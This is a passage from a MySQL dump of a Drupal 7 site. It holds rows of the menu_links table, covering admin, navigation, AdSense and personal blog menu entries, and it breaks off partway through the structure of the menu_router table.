menu','a:0:{}','system',-1,0,0,0,0,5,0,1,21,47,133,165,0,0,0,0,0),('management',166,47,'admin/structure/menu/item/%/edit','admin/structure/menu/item/%/edit','Edit menu link','a:0:{}','system',0,0,0,0,0,4,0,1,21,47,166,0,0,0,0,0,0),('management',167,118,'admin/people/permissions/roles/edit/%','admin/people/permissions/roles/edit/%','Edit role','a:0:{}','system',0,0,0,0,0,5,0,1,18,49,118,167,0,0,0,0,0),('management',168,105,'admin/config/media/image-styles/edit/%','admin/config/media/image-styles/edit/%','Edit style','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:25:\"Configure an image style.\";}}','system',0,0,1,0,0,5,0,1,8,46,105,168,0,0,0,0,0),('management',169,133,'admin/structure/menu/manage/%/list','admin/structure/menu/manage/%/list','List links','a:0:{}','system',-1,0,0,0,-10,5,0,1,21,47,133,169,0,0,0,0,0),('management',170,47,'admin/structure/menu/item/%/reset','admin/structure/menu/item/%/reset','Reset menu link','a:0:{}','system',0,0,0,0,0,4,0,1,21,47,170,0,0,0,0,0,0),('management',171,105,'admin/config/media/image-styles/delete/%','admin/config/media/image-styles/delete/%','Delete style','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:22:\"Delete an image style.\";}}','system',0,0,0,0,0,5,0,1,8,46,105,171,0,0,0,0,0),('management',172,105,'admin/config/media/image-styles/revert/%','admin/config/media/image-styles/revert/%','Revert style','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:22:\"Revert an image style.\";}}','system',0,0,0,0,0,5,0,1,8,46,105,172,0,0,0,0,0),('management',173,135,'admin/structure/types/manage/%/comment/display','admin/structure/types/manage/%/comment/display','Comment display','a:0:{}','system',-1,0,0,0,4,5,0,1,21,36,135,173,0,0,0,0,0),('management',174,135,'admin/structure/types/manage/%/comment/fields','admin/structure/types/manage/%/comment/fields','Comment fields','a:0:{}','system',-1,0,1,0,3,5,0,1,21,36,135,174,0,0,0,0,0),('management',175,155,'admin/structure/block/manage/%/%/configure','admin/structure/block/manage/%/%/configure','Configure block','a:0:{}','system',-1,0,0,0,0,5,0,1,21,30,155,175,0,0,0,0,0),('management',176,155,'admin/structure/block/manage/%/%/delete','admin/structure/block/manage/%/%/delete','Delete block','a:0:{}','system',-1,0,0,0,0,5,0,1,21,30,155,176,0,0,0,0,0),('management',177,136,'admin/config/regional/date-time/formats/%/delete','admin/config/regional/date-time/formats/%/delete','Delete date format','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:47:\"Allow users to delete a configured date format.\";}}','system',0,0,0,0,0,6,0,1,8,51,99,136,177,0,0,0,0),('management',178,145,'admin/config/regional/date-time/types/%/delete','admin/config/regional/date-time/types/%/delete','Delete date type','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Allow users to delete a configured date type.\";}}','system',0,0,0,0,0,6,0,1,8,51,99,145,178,0,0,0,0),('management',179,136,'admin/config/regional/date-time/formats/%/edit','admin/config/regional/date-time/formats/%/edit','Edit date format','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Allow users to edit a configured date format.\";}}','system',0,0,0,0,0,6,0,1,8,51,99,136,179,0,0,0,0),('management',180,168,'admin/config/media/image-styles/edit/%/add/%','admin/config/media/image-styles/edit/%/add/%','Add image effect','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:28:\"Add a new effect to a style.\";}}','system',0,0,0,0,0,6,0,1,8,46,105,168,180,0,0,0,0),('management',181,168,'admin/config/media/image-styles/edit/%/effects/%','admin/config/media/image-styles/edit/%/effects/%','Edit image effect','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:39:\"Edit an existing effect within a style.\";}}','system',0,0,1,0,0,6,0,1,8,46,105,168,181,0,0,0,0),('management',182,181,'admin/config/media/image-styles/edit/%/effects/%/delete','admin/config/media/image-styles/edit/%/effects/%/delete','Delete image effect','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:39:\"Delete an existing effect from a style.\";}}','system',0,0,0,0,0,7,0,1,8,46,105,168,181,182,0,0,0),('management',183,47,'admin/structure/menu/manage/main-menu','admin/structure/menu/manage/%','Main menu','a:0:{}','menu',0,0,0,0,0,4,0,1,21,47,183,0,0,0,0,0,0),('management',184,47,'admin/structure/menu/manage/management','admin/structure/menu/manage/%','Management','a:0:{}','menu',0,0,0,0,0,4,0,1,21,47,184,0,0,0,0,0,0),('management',185,47,'admin/structure/menu/manage/navigation','admin/structure/menu/manage/%','Navigation','a:0:{}','menu',0,0,0,0,0,4,0,1,21,47,185,0,0,0,0,0,0),('management',186,47,'admin/structure/menu/manage/user-menu','admin/structure/menu/manage/%','User menu','a:0:{}','menu',0,0,0,0,0,4,0,1,21,47,186,0,0,0,0,0,0),('navigation',187,0,'search','search','Search','a:0:{}','system',1,0,0,0,0,1,0,187,0,0,0,0,0,0,0,0,0),('navigation',188,187,'search/node','search/node','Content','a:0:{}','system',-1,0,0,0,-10,2,0,187,188,0,0,0,0,0,0,0,0),('navigation',189,187,'search/user','search/user','Users','a:0:{}','system',-1,0,0,0,0,2,0,187,189,0,0,0,0,0,0,0,0),('navigation',190,188,'search/node/%','search/node/%','Content','a:0:{}','system',-1,0,0,0,0,3,0,187,188,190,0,0,0,0,0,0,0),('navigation',191,17,'user/%/shortcuts','user/%/shortcuts','Shortcuts','a:0:{}','system',-1,0,0,0,0,2,0,17,191,0,0,0,0,0,0,0,0),('management',192,19,'admin/reports/search','admin/reports/search','Top search phrases','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"View most popular search phrases.\";}}','system',0,0,0,0,0,3,0,1,19,192,0,0,0,0,0,0,0),('navigation',193,189,'search/user/%','search/user/%','Users','a:0:{}','system',-1,0,0,0,0,3,0,187,189,193,0,0,0,0,0,0,0),('management',194,12,'admin/help/number','admin/help/number','number','a:0:{}','system',-1,0,0,0,0,3,0,1,12,194,0,0,0,0,0,0,0),('management',195,12,'admin/help/overlay','admin/help/overlay','overlay','a:0:{}','system',-1,0,0,0,0,3,0,1,12,195,0,0,0,0,0,0,0),('management',196,12,'admin/help/path','admin/help/path','path','a:0:{}','system',-1,0,0,0,0,3,0,1,12,196,0,0,0,0,0,0,0),('management',197,12,'admin/help/rdf','admin/help/rdf','rdf','a:0:{}','system',-1,0,0,0,0,3,0,1,12,197,0,0,0,0,0,0,0),('management',198,12,'admin/help/search','admin/help/search','search','a:0:{}','system',-1,0,0,0,0,3,0,1,12,198,0,0,0,0,0,0,0),('management',199,12,'admin/help/shortcut','admin/help/shortcut','shortcut','a:0:{}','system',-1,0,0,0,0,3,0,1,12,199,0,0,0,0,0,0,0),('management',200,53,'admin/config/search/settings','admin/config/search/settings','Search settings','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:67:\"Configure relevance settings for search and other indexing options.\";}}','system',0,0,0,0,-10,4,0,1,8,53,200,0,0,0,0,0,0),('management',201,61,'admin/config/user-interface/shortcut','admin/config/user-interface/shortcut','Shortcuts','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:29:\"Add and modify shortcut sets.\";}}','system',0,0,1,0,0,4,0,1,8,61,201,0,0,0,0,0,0),('management',202,53,'admin/config/search/path','admin/config/search/path','URL aliases','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:46:\"Change your site\'s URL paths by aliasing them.\";}}','system',0,0,1,0,-5,4,0,1,8,53,202,0,0,0,0,0,0),('management',203,202,'admin/config/search/path/add','admin/config/search/path/add','Add alias','a:0:{}','system',-1,0,0,0,0,5,0,1,8,53,202,203,0,0,0,0,0),('management',204,201,'admin/config/user-interface/shortcut/add-set','admin/config/user-interface/shortcut/add-set','Add shortcut set','a:0:{}','system',-1,0,0,0,0,5,0,1,8,61,201,204,0,0,0,0,0),('management',205,200,'admin/config/search/settings/reindex','admin/config/search/settings/reindex','Clear index','a:0:{}','system',-1,0,0,0,0,5,0,1,8,53,200,205,0,0,0,0,0),('management',206,201,'admin/config/user-interface/shortcut/%','admin/config/user-interface/shortcut/%','Edit shortcuts','a:0:{}','system',0,0,1,0,0,5,0,1,8,61,201,206,0,0,0,0,0),('management',207,202,'admin/config/search/path/list','admin/config/search/path/list','List','a:0:{}','system',-1,0,0,0,-10,5,0,1,8,53,202,207,0,0,0,0,0),('management',208,206,'admin/config/user-interface/shortcut/%/add-link','admin/config/user-interface/shortcut/%/add-link','Add shortcut','a:0:{}','system',-1,0,0,0,0,6,0,1,8,61,201,206,208,0,0,0,0),('management',209,202,'admin/config/search/path/delete/%','admin/config/search/path/delete/%','Delete alias','a:0:{}','system',0,0,0,0,0,5,0,1,8,53,202,209,0,0,0,0,0),('management',210,206,'admin/config/user-interface/shortcut/%/delete','admin/config/user-interface/shortcut/%/delete','Delete shortcut set','a:0:{}','system',0,0,0,0,0,6,0,1,8,61,201,206,210,0,0,0,0),('management',211,202,'admin/config/search/path/edit/%','admin/config/search/path/edit/%','Edit alias','a:0:{}','system',0,0,0,0,0,5,0,1,8,53,202,211,0,0,0,0,0),('management',212,206,'admin/config/user-interface/shortcut/%/edit','admin/config/user-interface/shortcut/%/edit','Edit set name','a:0:{}','system',-1,0,0,0,10,6,0,1,8,61,201,206,212,0,0,0,0),('management',213,201,'admin/config/user-interface/shortcut/link/%','admin/config/user-interface/shortcut/link/%','Edit shortcut','a:0:{}','system',0,0,1,0,0,5,0,1,8,61,201,213,0,0,0,0,0),('management',214,206,'admin/config/user-interface/shortcut/%/links','admin/config/user-interface/shortcut/%/links','List links','a:0:{}','system',-1,0,0,0,0,6,0,1,8,61,201,206,214,0,0,0,0),('management',215,213,'admin/config/user-interface/shortcut/link/%/delete','admin/config/user-interface/shortcut/link/%/delete','Delete shortcut','a:0:{}','system',0,0,0,0,0,6,0,1,8,61,201,213,215,0,0,0,0),('shortcut-set-1',216,0,'node/add','node/add','Add content','a:0:{}','menu',0,0,0,0,-20,1,0,216,0,0,0,0,0,0,0,0,0),('shortcut-set-1',217,0,'admin/content','admin/content','Find content','a:0:{}','menu',0,0,0,0,-19,1,0,217,0,0,0,0,0,0,0,0,0),('navigation',219,6,'node/add/article','node/add/article','Article','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:89:\"Use articles for time-sensitive content like news, press releases or blog posts.\";}}','system',0,0,0,0,0,2,0,6,219,0,0,0,0,0,0,0,0),('navigation',220,6,'node/add/page','node/add/page','Basic page','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:77:\"Use basic pages for your static content, such as an \'About us\' page.\";}}','system',0,0,0,0,0,2,0,6,220,0,0,0,0,0,0,0,0),('management',221,12,'admin/help/toolbar','admin/help/toolbar','toolbar','a:0:{}','system',-1,0,0,0,0,3,0,1,12,221,0,0,0,0,0,0,0),('management',298,19,'admin/reports/updates','admin/reports/updates','Available updates','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:82:\"Get a status report about available updates for your installed modules and themes.\";}}','system',0,0,0,0,-50,3,0,1,19,298,0,0,0,0,0,0,0),('management',299,7,'admin/appearance/install','admin/appearance/install','Install new theme','a:0:{}','system',-1,0,0,0,25,3,0,1,7,299,0,0,0,0,0,0,0),('management',300,16,'admin/modules/update','admin/modules/update','Update','a:0:{}','system',-1,0,0,0,10,3,0,1,16,300,0,0,0,0,0,0,0),('management',301,16,'admin/modules/install','admin/modules/install','Install new module','a:0:{}','system',-1,0,0,0,25,3,0,1,16,301,0,0,0,0,0,0,0),('management',302,7,'admin/appearance/update','admin/appearance/update','Update','a:0:{}','system',-1,0,0,0,10,3,0,1,7,302,0,0,0,0,0,0,0),('management',303,12,'admin/help/update','admin/help/update','update','a:0:{}','system',-1,0,0,0,0,3,0,1,12,303,0,0,0,0,0,0,0),('management',304,298,'admin/reports/updates/install','admin/reports/updates/install','Install new module or theme','a:0:{}','system',-1,0,0,0,25,4,0,1,19,298,304,0,0,0,0,0,0),('management',305,298,'admin/reports/updates/update','admin/reports/updates/update','Update','a:0:{}','system',-1,0,0,0,10,4,0,1,19,298,305,0,0,0,0,0,0),('management',306,298,'admin/reports/updates/list','admin/reports/updates/list','List','a:0:{}','system',-1,0,0,0,0,4,0,1,19,298,306,0,0,0,0,0,0),('management',307,298,'admin/reports/updates/settings','admin/reports/updates/settings','Settings','a:0:{}','system',-1,0,0,0,50,4,0,1,19,298,307,0,0,0,0,0,0),('management',346,0,'http://www.ollital.de/blog','','Blog','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:9:\"Mein Blog\";}}','menu',0,1,0,0,0,1,1,346,0,0,0,0,0,0,0,0,0),('main-menu',347,0,'https://www.ollital.de/wordpress','','Blog','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:0:\"\";}}','menu',0,1,0,0,1,1,1,347,0,0,0,0,0,0,0,0,0),('main-menu',348,0,'http://wiki.piratenpartei.de/Benutzer:Darkwing','','Pirat','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:0:\"\";}}','menu',0,1,0,0,2,1,1,348,0,0,0,0,0,0,0,0,0),('main-menu',350,0,'node/4','node/%','Termine','a:0:{}','menu',0,0,0,0,3,1,0,350,0,0,0,0,0,0,0,0,0),('main-menu',351,0,'node/5','node/%','Mitgliedschaften','a:0:{}','menu',0,0,0,0,4,1,0,351,0,0,0,0,0,0,0,0,0),('main-menu',390,0,'node/6','node/%','Anträge','a:0:{}','menu',0,0,0,0,5,1,0,390,0,0,0,0,0,0,0,0,0),('main-menu',391,0,'node/7','node/%','Freifunk','a:0:{}','menu',0,0,0,0,6,1,0,391,0,0,0,0,0,0,0,0,0),('management',392,54,'admin/appearance/settings/multipurpose','admin/appearance/settings/multipurpose','Multipurpose Theme','a:0:{}','system',-1,0,0,0,0,4,0,1,7,54,392,0,0,0,0,0,0),('management',393,54,'admin/appearance/settings/responsive_bartik','admin/appearance/settings/responsive_bartik','Responsive Bartik','a:0:{}','system',-1,0,0,0,0,4,0,1,7,54,393,0,0,0,0,0,0),('management',394,30,'admin/structure/block/list/multipurpose','admin/structure/block/list/multipurpose','Multipurpose Theme','a:0:{}','system',-1,0,0,0,0,4,0,1,21,30,394,0,0,0,0,0,0),('management',395,30,'admin/structure/block/list/responsive_bartik','admin/structure/block/list/responsive_bartik','Responsive Bartik','a:0:{}','system',-1,0,0,0,-10,4,0,1,21,30,395,0,0,0,0,0,0),('management',396,394,'admin/structure/block/list/multipurpose/add','admin/structure/block/list/multipurpose/add','Add block','a:0:{}','system',-1,0,0,0,0,5,0,1,21,30,394,396,0,0,0,0,0),('management',398,131,'admin/structure/block/list/bartik/add','admin/structure/block/list/bartik/add','Add block','a:0:{}','system',-1,0,0,0,0,5,0,1,21,30,131,398,0,0,0,0,0),('navigation',399,0,'contact','contact','Contact','a:0:{}','system',1,0,0,0,0,1,0,399,0,0,0,0,0,0,0,0,0),('navigation',400,17,'user/%/contact','user/%/contact','Contact','a:0:{}','system',-1,0,0,0,2,2,0,17,400,0,0,0,0,0,0,0,0),('management',401,21,'admin/structure/contact','admin/structure/contact','Contact form','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:71:\"Create a system contact form and set up categories for the form to use.\";}}','system',0,0,1,0,0,3,0,1,21,401,0,0,0,0,0,0,0),('management',402,19,'admin/reports/hits','admin/reports/hits','Recent hits','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"View pages that have recently been visited.\";}}','system',0,0,0,0,0,3,0,1,19,402,0,0,0,0,0,0,0),('management',403,19,'admin/reports/pages','admin/reports/pages','Top pages','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:41:\"View pages that have been hit frequently.\";}}','system',0,0,0,0,1,3,0,1,19,403,0,0,0,0,0,0,0),('management',404,19,'admin/reports/referrers','admin/reports/referrers','Top referrers','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:19:\"View top referrers.\";}}','system',0,0,0,0,0,3,0,1,19,404,0,0,0,0,0,0,0),('management',405,19,'admin/reports/visitors','admin/reports/visitors','Top visitors','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View visitors that hit many pages.\";}}','system',0,0,0,0,2,3,0,1,19,405,0,0,0,0,0,0,0),('navigation',406,5,'node/%/track','node/%/track','Track','a:0:{}','system',-1,0,0,0,2,2,0,5,406,0,0,0,0,0,0,0,0),('management',407,12,'admin/help/contact','admin/help/contact','contact','a:0:{}','system',-1,0,0,0,0,3,0,1,12,407,0,0,0,0,0,0,0),('management',408,12,'admin/help/php','admin/help/php','php','a:0:{}','system',-1,0,0,0,0,3,0,1,12,408,0,0,0,0,0,0,0),('management',409,12,'admin/help/statistics','admin/help/statistics','statistics','a:0:{}','system',-1,0,0,0,0,3,0,1,12,409,0,0,0,0,0,0,0),('management',410,401,'admin/structure/contact/add','admin/structure/contact/add','Add category','a:0:{}','system',-1,0,0,0,1,4,0,1,21,401,410,0,0,0,0,0,0),('management',411,19,'admin/reports/access/%','admin/reports/access/%','Details','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:16:\"View access log.\";}}','system',0,0,0,0,0,3,0,1,19,411,0,0,0,0,0,0,0),('management',412,56,'admin/config/system/statistics','admin/config/system/statistics','Statistics','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:68:\"Control details about what and how your site logs access statistics.\";}}','system',0,0,0,0,-15,4,0,1,8,56,412,0,0,0,0,0,0),('navigation',413,17,'user/%/track/navigation','user/%/track/navigation','Track page visits','a:0:{}','system',-1,0,0,0,2,2,0,17,413,0,0,0,0,0,0,0,0),('management',414,401,'admin/structure/contact/delete/%','admin/structure/contact/delete/%','Delete contact','a:0:{}','system',0,0,0,0,0,4,0,1,21,401,414,0,0,0,0,0,0),('management',415,401,'admin/structure/contact/edit/%','admin/structure/contact/edit/%','Edit contact category','a:0:{}','system',0,0,0,0,0,4,0,1,21,401,415,0,0,0,0,0,0),('management',416,19,'admin/reports/adsense','admin/reports/adsense','AdSense clicks','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:21:\"Track AdSense clicks.\";}}','system',0,0,1,0,0,3,0,1,19,416,0,0,0,0,0,0,0),('management',417,12,'admin/help/adsense','admin/help/adsense','adsense','a:0:{}','system',-1,0,0,0,0,3,0,1,12,417,0,0,0,0,0,0,0),('management',418,64,'admin/config/services/adsense','admin/config/services/adsense','AdSense','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:29:\"Configure Google AdSense Ads.\";}}','system',0,0,0,0,0,4,0,1,8,64,418,0,0,0,0,0,0),('management',419,416,'admin/reports/adsense/by_day','admin/reports/adsense/by_day','By day','a:0:{}','system',0,0,0,0,0,4,0,1,19,416,419,0,0,0,0,0,0),('management',420,416,'admin/reports/adsense/top_pages','admin/reports/adsense/top_pages','Top pages','a:0:{}','system',0,0,0,0,0,4,0,1,19,416,420,0,0,0,0,0,0),('management',421,418,'admin/config/services/adsense/click','admin/config/services/adsense/click','Clicks','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:32:\"Track the clicks on Adsense ads.\";}}','system',-1,0,0,0,9,5,0,1,8,64,418,421,0,0,0,0,0),('management',422,418,'admin/config/services/adsense/managed','admin/config/services/adsense/managed','Managed Ads','a:0:{}','system',-1,0,0,0,1,5,0,1,8,64,418,422,0,0,0,0,0),('management',423,418,'admin/config/services/adsense/oldcode','admin/config/services/adsense/oldcode','Old Code Ads','a:0:{}','system',-1,0,0,0,3,5,0,1,8,64,418,423,0,0,0,0,0),('management',424,418,'admin/config/services/adsense/publisher','admin/config/services/adsense/publisher','Publisher ID','a:0:{}','system',-1,0,0,0,0,5,0,1,8,64,418,424,0,0,0,0,0),('management',425,418,'admin/config/services/adsense/main','admin/config/services/adsense/main','Settings','a:0:{}','system',-1,0,0,0,10,5,0,1,8,64,418,425,0,0,0,0,0),('management',426,424,'admin/config/services/adsense/publisher/site','admin/config/services/adsense/publisher/site','Site ID','a:0:{}','system',-1,0,0,0,-1,6,0,1,8,64,418,424,426,0,0,0,0),('management',427,418,'admin/config/services/adsense/cse','admin/config/services/adsense/cse','Custom Search','a:0:{}','system',-1,0,0,0,2,5,0,1,8,64,418,427,0,0,0,0,0),('navigation',504,0,'blog','blog','Blogs','a:0:{}','system',1,0,1,0,0,1,0,504,0,0,0,0,0,0,0,0,0),('navigation',505,504,'blog/%','blog/%','My blog','a:0:{}','system',0,0,0,0,0,2,0,504,505,0,0,0,0,0,0,0,0),('navigation',506,6,'node/add/blog','node/add/blog','Blog entry','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:58:\"Use for multi-user blogs. Every user gets a personal blog.\";}}','system',0,0,0,0,0,2,0,6,506,0,0,0,0,0,0,0,0),('management',507,12,'admin/help/blog','admin/help/blog','blog','a:0:{}','system',-1,0,0,0,0,3,0,1,12,507,0,0,0,0,0,0,0),('navigation',508,4,'filter/tips/%','filter/tips/%','Compose tips','a:0:{}','system',0,0,0,0,0,2,0,4,508,0,0,0,0,0,0,0,0),('management',509,89,'admin/structure/taxonomy/%/display','admin/structure/taxonomy/%/display','Manage display','a:0:{}','system',-1,0,0,0,2,5,0,1,21,57,89,509,0,0,0,0,0),('management',510,90,'admin/config/people/accounts/display','admin/config/people/accounts/display','Manage display','a:0:{}','system',-1,0,0,0,2,5,0,1,8,48,90,510,0,0,0,0,0),('management',511,89,'admin/structure/taxonomy/%/fields','admin/structure/taxonomy/%/fields','Manage fields','a:0:{}','system',-1,0,1,0,1,5,0,1,21,57,89,511,0,0,0,0,0),('management',512,90,'admin/config/people/accounts/fields','admin/config/people/accounts/fields','Manage fields','a:0:{}','system',-1,0,1,0,1,5,0,1,8,48,90,512,0,0,0,0,0),('management',513,509,'admin/structure/taxonomy/%/display/default','admin/structure/taxonomy/%/display/default','Default','a:0:{}','system',-1,0,0,0,-10,6,0,1,21,57,89,509,513,0,0,0,0),('management',514,510,'admin/config/people/accounts/display/default','admin/config/people/accounts/display/default','Default','a:0:{}','system',-1,0,0,0,-10,6,0,1,8,48,90,510,514,0,0,0,0),('management',515,135,'admin/structure/types/manage/%/display','admin/structure/types/manage/%/display','Manage display','a:0:{}','system',-1,0,0,0,2,5,0,1,21,36,135,515,0,0,0,0,0),('management',516,135,'admin/structure/types/manage/%/fields','admin/structure/types/manage/%/fields','Manage fields','a:0:{}','system',-1,0,1,0,1,5,0,1,21,36,135,516,0,0,0,0,0),('management',517,509,'admin/structure/taxonomy/%/display/full','admin/structure/taxonomy/%/display/full','Taxonomy term page','a:0:{}','system',-1,0,0,0,0,6,0,1,21,57,89,509,517,0,0,0,0),('management',518,510,'admin/config/people/accounts/display/full','admin/config/people/accounts/display/full','User account','a:0:{}','system',-1,0,0,0,0,6,0,1,8,48,90,510,518,0,0,0,0),('management',519,511,'admin/structure/taxonomy/%/fields/%','admin/structure/taxonomy/%/fields/%','','a:0:{}','system',0,0,0,0,0,6,0,1,21,57,89,511,519,0,0,0,0),('management',520,512,'admin/config/people/accounts/fields/%','admin/config/people/accounts/fields/%','','a:0:{}','system',0,0,0,0,0,6,0,1,8,48,90,512,520,0,0,0,0),('management',521,515,'admin/structure/types/manage/%/display/default','admin/structure/types/manage/%/display/default','Default','a:0:{}','system',-1,0,0,0,-10,6,0,1,21,36,135,515,521,0,0,0,0),('management',522,515,'admin/structure/types/manage/%/display/full','admin/structure/types/manage/%/display/full','Full content','a:0:{}','system',-1,0,0,0,0,6,0,1,21,36,135,515,522,0,0,0,0),('management',523,515,'admin/structure/types/manage/%/display/rss','admin/structure/types/manage/%/display/rss','RSS','a:0:{}','system',-1,0,0,0,2,6,0,1,21,36,135,515,523,0,0,0,0),('management',524,515,'admin/structure/types/manage/%/display/search_index','admin/structure/types/manage/%/display/search_index','Search index','a:0:{}','system',-1,0,0,0,3,6,0,1,21,36,135,515,524,0,0,0,0),('management',525,515,'admin/structure/types/manage/%/display/search_result','admin/structure/types/manage/%/display/search_result','Search result highlighting input','a:0:{}','system',-1,0,0,0,4,6,0,1,21,36,135,515,525,0,0,0,0),('management',526,515,'admin/structure/types/manage/%/display/teaser','admin/structure/types/manage/%/display/teaser','Teaser','a:0:{}','system',-1,0,0,0,1,6,0,1,21,36,135,515,526,0,0,0,0),('management',527,516,'admin/structure/types/manage/%/fields/%','admin/structure/types/manage/%/fields/%','','a:0:{}','system',0,0,0,0,0,6,0,1,21,36,135,516,527,0,0,0,0),('management',528,519,'admin/structure/taxonomy/%/fields/%/delete','admin/structure/taxonomy/%/fields/%/delete','Delete','a:0:{}','system',-1,0,0,0,10,7,0,1,21,57,89,511,519,528,0,0,0),('management',529,519,'admin/structure/taxonomy/%/fields/%/edit','admin/structure/taxonomy/%/fields/%/edit','Edit','a:0:{}','system',-1,0,0,0,0,7,0,1,21,57,89,511,519,529,0,0,0),('management',530,519,'admin/structure/taxonomy/%/fields/%/field-settings','admin/structure/taxonomy/%/fields/%/field-settings','Field settings','a:0:{}','system',-1,0,0,0,0,7,0,1,21,57,89,511,519,530,0,0,0),('management',531,519,'admin/structure/taxonomy/%/fields/%/widget-type','admin/structure/taxonomy/%/fields/%/widget-type','Widget type','a:0:{}','system',-1,0,0,0,0,7,0,1,21,57,89,511,519,531,0,0,0),('management',532,520,'admin/config/people/accounts/fields/%/delete','admin/config/people/accounts/fields/%/delete','Delete','a:0:{}','system',-1,0,0,0,10,7,0,1,8,48,90,512,520,532,0,0,0),('management',533,520,'admin/config/people/accounts/fields/%/edit','admin/config/people/accounts/fields/%/edit','Edit','a:0:{}','system',-1,0,0,0,0,7,0,1,8,48,90,512,520,533,0,0,0),('management',534,520,'admin/config/people/accounts/fields/%/field-settings','admin/config/people/accounts/fields/%/field-settings','Field settings','a:0:{}','system',-1,0,0,0,0,7,0,1,8,48,90,512,520,534,0,0,0),('management',535,520,'admin/config/people/accounts/fields/%/widget-type','admin/config/people/accounts/fields/%/widget-type','Widget type','a:0:{}','system',-1,0,0,0,0,7,0,1,8,48,90,512,520,535,0,0,0),('management',536,173,'admin/structure/types/manage/%/comment/display/default','admin/structure/types/manage/%/comment/display/default','Default','a:0:{}','system',-1,0,0,0,-10,6,0,1,21,36,135,173,536,0,0,0,0),('management',537,173,'admin/structure/types/manage/%/comment/display/full','admin/structure/types/manage/%/comment/display/full','Full comment','a:0:{}','system',-1,0,0,0,0,6,0,1,21,36,135,173,537,0,0,0,0),('management',538,174,'admin/structure/types/manage/%/comment/fields/%','admin/structure/types/manage/%/comment/fields/%','','a:0:{}','system',0,0,0,0,0,6,0,1,21,36,135,174,538,0,0,0,0),('management',539,527,'admin/structure/types/manage/%/fields/%/delete','admin/structure/types/manage/%/fields/%/delete','Delete','a:0:{}','system',-1,0,0,0,10,7,0,1,21,36,135,516,527,539,0,0,0),('management',540,527,'admin/structure/types/manage/%/fields/%/edit','admin/structure/types/manage/%/fields/%/edit','Edit','a:0:{}','system',-1,0,0,0,0,7,0,1,21,36,135,516,527,540,0,0,0),('management',541,527,'admin/structure/types/manage/%/fields/%/field-settings','admin/structure/types/manage/%/fields/%/field-settings','Field settings','a:0:{}','system',-1,0,0,0,0,7,0,1,21,36,135,516,527,541,0,0,0),('management',542,527,'admin/structure/types/manage/%/fields/%/widget-type','admin/structure/types/manage/%/fields/%/widget-type','Widget type','a:0:{}','system',-1,0,0,0,0,7,0,1,21,36,135,516,527,542,0,0,0),('management',543,538,'admin/structure/types/manage/%/comment/fields/%/delete','admin/structure/types/manage/%/comment/fields/%/delete','Delete','a:0:{}','system',-1,0,0,0,10,7,0,1,21,36,135,174,538,543,0,0,0),('management',544,538,'admin/structure/types/manage/%/comment/fields/%/edit','admin/structure/types/manage/%/comment/fields/%/edit','Edit','a:0:{}','system',-1,0,0,0,0,7,0,1,21,36,135,174,538,544,0,0,0),('management',545,538,'admin/structure/types/manage/%/comment/fields/%/field-settings','admin/structure/types/manage/%/comment/fields/%/field-settings','Field settings','a:0:{}','system',-1,0,0,0,0,7,0,1,21,36,135,174,538,545,0,0,0),('management',546,538,'admin/structure/types/manage/%/comment/fields/%/widget-type','admin/structure/types/manage/%/comment/fields/%/widget-type','Widget type','a:0:{}','system',-1,0,0,0,0,7,0,1,21,36,135,174,538,546,0,0,0); /*!40000 ALTER TABLE `menu_links` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `menu_router` -- DROP TABLE IF EXISTS `menu_router`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `menu_router` ( `path` varchar(255) NOT NULL DEFAULT '' COMMENT 'Primary Key: the Drupal path this entry describes', `load_functions` blob NOT NULL COMMENT 'A serialized array of function names (like node_load) to be called to load an object corresponding to a part of the current path.', `to_arg_functions` blob NOT NULL COMMENT 'A serialized array of function names (like user_uid_optional_to_arg) to be called to replace a part of the router path with another string.', `access_callback` varchar(255) NOT NULL DEFAULT '' COMMENT 'The callback which determines the access to this router path. Defaults to user_access.', `access_arguments` blob COMMENT 'A serialized array of arguments for the access callback.', `page_callback` varchar(255) NOT NULL DEFAULT '' COMMENT 'The name of the function that renders the page.', `page_arguments` blob COMMENT 'A serialized array of arguments for the page callback.', `delivery_callback` varchar(255) NOT NULL DEFAULT '' COMMENT 'The name of the function that sends the result of the page_callback function to the browser.', `fit` int(11) NOT NULL DEFAULT '0' COMMENT 'A numeric representation of how specific the path is.', `number_parts` smallint(6) NOT NULL DEFAULT '0' COMMENT 'Number of parts in this router path.', `context` int(11) NOT NULL DEFAULT '0' COMMENT 'Only for local tasks (tabs) - the context of a local task to control its placement.', `tab_parent` varchar(255) NOT NULL DEFAULT '' COMMENT 'Only for local tasks (tabs) - the router path of the parent page (which may also be a local task).', `tab_root` varchar(255) NOT NULL DEFAULT '' COMMENT 'Router path of the closest non-tab parent page. For pages that are not local tasks, this will be the same as the path.', `title` varchar(255) NOT NULL DEFAULT '' 